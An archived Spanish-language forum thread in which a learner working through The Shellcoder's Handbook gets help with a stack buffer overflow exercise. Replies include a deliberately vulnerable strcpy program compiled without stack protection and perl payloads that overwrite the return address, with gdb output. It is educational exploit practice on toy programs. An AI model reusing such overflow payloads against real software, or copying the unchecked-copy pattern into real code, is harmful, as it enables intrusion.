Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: pianista en 23 Diciembre 2011, 14:48 pm



Título: Duda sobre buffer overflow
Publicado por: pianista en 23 Diciembre 2011, 14:48 pm
Hola qué tal?

A ver, tengo una duda que no me está permitiendo avanzar en este campo.

Empecé a leer el libro de shellcoders sobre exploits, entonces uno de los primeros ejemplos del libro es:

Código:
void return_input(void)
{
char array[30];

gets(array);
printf("%s\n",array);
}

main()
{
return_input();

return 0;
}


Vale, la idea es la siguiente:

Desensamblas con gdb la parte del main y obtienes la dirección a la que se invoca al return_input, con el fin de desbordar el buffer para que lo ejecute dos veces.

Aquí llega la cuestión, desesamblando me saca (por poner un ejemplo):

0x080483ed <main+3> call 0x80483c4 <return_input>

Y desbordo el buffer como indica el libro :
printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDD\xed\x83\x04\x08"|./overflow

Ahí está la cuestión, que no logro de ninguna manera que no dé segmentation fault, y que me repita dos veces la llamada al return_input

Estoy usando wifislax 2.0, que aquellos kernel y gcc y tal, no llevaban protecciones overflow, pero claro, yo lo que pienso es lo siguiente:

Cómo coño va  afuncionar, esa dirección que saca el gdb, no tiene por qué coincidir con la que haya en tiempo de ejecución, no???

Saludos y espero ayuda, que me encantaría iniciarme en profundidad, aunque ya he visto que el tema en los últimos años, ha ido poniendo muchísimas protecciones.





Título: Re: Duda sobre buffer overflow
Publicado por: Sagrini en 23 Diciembre 2011, 16:08 pm
Tal vez la dirección no esté bien sobreescrita, no sea la correcta... :P Ponnos la salida de GDB.


Título: Re: Duda sobre buffer overflow
Publicado por: pianista en 23 Diciembre 2011, 16:26 pm
Muy bien, esta es la salida del gdb:

Código:
Dump of assembler code for funcion main:
0x080483d2 <main+0>: push %ebp
0x080483d3 <main+1>: mov %esp,%ebp
0x080483d5 <main+3>: call 0x80483b4 <return_inpu>
0x080483da <main+8>: mov $0x0,%eax
0x080483df <main+13>: pop%ebp
0x080483e0 <main+14>: ret

Entiendo que habría que lograr escribir la dirección 0x080483d5 que es donde se hace la invocación a return_input y para ello emplearía :
\xd5\x83\x04\x08

Saludos


Título: Re: Duda sobre buffer overflow
Publicado por: Sagrini en 23 Diciembre 2011, 16:27 pm
TODA la salida de GDB. Incluye el resultado cuando corres el programa desde GDB.


Título: Re: Duda sobre buffer overflow
Publicado por: Ivanchuk en 23 Diciembre 2011, 16:51 pm
Cómo coño va  afuncionar, esa dirección que saca el gdb, no tiene por qué coincidir con la que haya en tiempo de ejecución, no???

Si, esa direccion es la misma, esta en duro en la cabecera del ejecutable. Lo que te puede cambiar es la dir de la pila.

Código
  1. readelf -S a.out | grep .text

Muy bien, esta es la salida del gdb:

Código:
Dump of assembler code for funcion main:
0x080483d2 <main+0>: push %ebp
0x080483d3 <main+1>: mov %esp,%ebp
0x080483d5 <main+3>: call 0x80483b4 <return_inpu>
0x080483da <main+8>: mov $0x0,%eax
0x080483df <main+13>: pop%ebp
0x080483e0 <main+14>: ret

Entiendo que habría que lograr escribir la dirección 0x080483d5 que es donde se hace la invocación a return_input y para ello emplearía :
\xd5\x83\x04\x08

Tenes que poner la dir justo despues del call, la 0x080483da.

Saludos !


Título: Re: Duda sobre buffer overflow
Publicado por: Sagrini en 23 Diciembre 2011, 16:56 pm
Un último detalle sería decir que para comprobar si funciona correctamente, sería mejor declarar una función que no se llamase en el programa, y hacer que se ejecute con el retorno. P. ej:
1. Dirección de func_oculta () = 0x08005f32
2. Ret-Buff = 32
$ perl -e 'print "\x90"x32 . "\x32\x5f\x00\x08"'

Hey Iván! Que tal? ;)


Título: Re: Duda sobre buffer overflow
Publicado por: pianista en 23 Diciembre 2011, 16:57 pm
Pero me refiero:

La dirección que escoge el compilador, es una dirección que al final en memoria no va a ser esa, si no que va a ser totalmente diferente, dependerá de la memoria libre etc etc etc.

Mi duda es, puesto que el SO al final abstrae la memoria para el programa de manera que el cree que tiene toda la memoria del mundo, aunque en realidad tenga sus cachitos en cada cacho de memoria y no se corresponda con sus direcciones, al final las direcciones del compilador son las que usa en esa memoria virtual???

Respecto a lo de ejecutarlo es algo que te iba a preguntar, yo lo ejecuto a pelo, pero a lo mejor es que debería ejecutarlo en el gdb xD

Código:
printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDD\xed\x83\x04\x08"|./overflow
Sale:
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDí
Segmentation fault

Saludos y gracias!

Advertencia - mientras estabas escribiendo, una nueva respuesta fue publicada. Probablemente desees abandonar este campo y ir a cultivar campos de arroz

Lo de meter otra función lo probaré también.


Título: Re: Duda sobre buffer overflow
Publicado por: Sagrini en 23 Diciembre 2011, 17:12 pm
Eso es que no has sobreescrito la dirección correcta. Corre desde GDB y mira el error que te da ;)
$ gdb -q code
(gdb) r $(perl -e 'print "..."')
...
(gdb)
Ponme la salida ;)


Título: Re: Duda sobre buffer overflow
Publicado por: Ivanchuk en 23 Diciembre 2011, 18:48 pm
Un último detalle sería decir que para comprobar si funciona correctamente, sería mejor declarar una función que no se llamase en el programa, y hacer que se ejecute con el retorno. P. ej:
1. Dirección de func_oculta () = 0x08005f32
2. Ret-Buff = 32
$ perl -e 'print "\x90"x32 . "\x32\x5f\x00\x08"'

Hey Iván! Que tal? ;)
Es una buena idea. Sagrini is back ! todo bien , vos?
Pero me refiero:

La dirección que escoge el compilador, es una dirección que al final en memoria no va a ser esa, si no que va a ser totalmente diferente, dependerá de la memoria libre etc etc etc.

Mi duda es, puesto que el SO al final abstrae la memoria para el programa de manera que el cree que tiene toda la memoria del mundo, aunque en realidad tenga sus cachitos en cada cacho de memoria y no se corresponda con sus direcciones, al final las direcciones del compilador son las que usa en esa memoria virtual???

Al final lo unico que ves son las virtuales. Tendrias que correrlo en gdb y depurarlo con si para ver bien a donde vas a parar y si  sobreescribis bien el ret.


Título: Re: Duda sobre buffer overflow
Publicado por: pianista en 25 Diciembre 2011, 16:20 pm
(http://img9.imageshack.us/img9/6498/96003959.jpg)

Aquí os lo dejo la salida entera usando perl.

Ummm no creo que haya que usar la siguiente dirección, puesto que yo lo que quiero, es invocar dos veces a la misma función como indica el libro.

Gracias por vuestra ayuda, me está costando, pero es muy interesante el tema y más después de haber programado tanto en C hace años.

Saludos


Título: Re: Duda sobre buffer overflow
Publicado por: buscador-tecnologico en 25 Diciembre 2011, 19:42 pm
ostias, y ese libro? parece interesante,no? el titulo del libro es: shellcoders sobre exploits? de que escritor?


100000 gracias y feliz navidad amigos!


Título: Re: Duda sobre buffer overflow
Publicado por: Sagrini en 1 Enero 2012, 18:16 pm
Ahora mismo estoy un poco liadillo, te paso una url que tal vez te sirva y en un ratillo me pongo ;)
http://foro.elhacker.net/bugs_y_exploits/first_bof_linux_attack_sagrini_2010_elhackernet_funciona-t317514.0.html


Título: Re: Duda sobre buffer overflow
Publicado por: pianista en 1 Enero 2012, 19:40 pm
Muchas gracias  ;)

Te lo agradezco

Saludos


Título: Re: Duda sobre buffer overflow
Publicado por: AlbertoBSD en 1 Enero 2012, 20:13 pm
Pianista muy buenos dias, y exito este año!

¿Que libro estas siguiendo?

La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input

Saludos.


Título: Re: Duda sobre buffer overflow
Publicado por: Sagrini en 1 Enero 2012, 23:03 pm
Código
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <stdlib.h>
  4.  
  5. int vuln (char *buff)
  6. {
  7.    char buffer [36];
  8.    strcpy (buffer, buff);
  9. }
  10.  
  11. int main (int argc, char *argv [])
  12. {
  13.    vuln (argv [1]);
  14. }
  15.  
  16. int feo ()
  17. {
  18.    printf ("Eres feo!!!");
  19.    exit (0);
  20. }
  21.  
Código:
sagrini@pc11-1:~/Escritorio$ nano code.c
sagrini@pc11-1:~/Escritorio$ gcc -o code code.c --no-stack-protector
sagrini@pc11-1:~/Escritorio$ gdb -q code
(gdb) r $(perl -e 'print "A"x36 . "BBBB"x3')
Program received signal SIGSEGV, Segmentation fault.
0x08048408 in __do_global_dtors_aux ()
(gdb)
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) r $(perl -e 'print "\x90"x36 . "\x89\x84\x04\x08"x5')
Eres feo!!!
(gdb) quit
sagrini@pc11-1:~/Escritorio$

Ahora modifico para que funcione con una shellcode ;)


Título: Re: Duda sobre buffer overflow
Publicado por: adulti en 5 Enero 2012, 02:53 am
¿Que libro estas siguiendo?

La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input


Título: Re: Duda sobre buffer overflow
Publicado por: AlbertoBSD en 5 Enero 2012, 16:08 pm
Funciono?


Título: Re: Duda sobre buffer overflow
Publicado por: Sagrini en 5 Enero 2012, 17:38 pm
El que? Lo mio, perfectamente.
Os recomiendo el libro "Hacking, técnicas avanzadas", de Jon Erickson. Es buenisimo.


Título: Re: Duda sobre buffer overflow
Publicado por: <<<-Basura->>> en 7 Enero 2012, 04:51 am
Mm.. se que el comentario no viene al caso, pero podrías pasar el link del libro para descargarlo y yo también leerlo  :huh:


Título: Re: Duda sobre buffer overflow
Publicado por: pianista en 8 Enero 2012, 19:56 pm
Disculpad, las fiestas navideñas es lo que tienen, ya estoy de nuevo por aquí jeje.

Ahora lo voy a probar que he estado liado desde entonces.

El libro es: The Shellcoders handbook

Lo compré en amazon aunque tiene bastantes años.

Luego por otro lado había uno muy majo que era el de The art of exploitation o algo así.

Saludos


Título: Re: Duda sobre buffer overflow
Publicado por: pianista en 8 Enero 2012, 20:23 pm
Probado Sagrini, muchas gracias, funciona perfectamente.

Le daré unas vueltas y lo modificaré para probarlo de otras maneras.

Saludos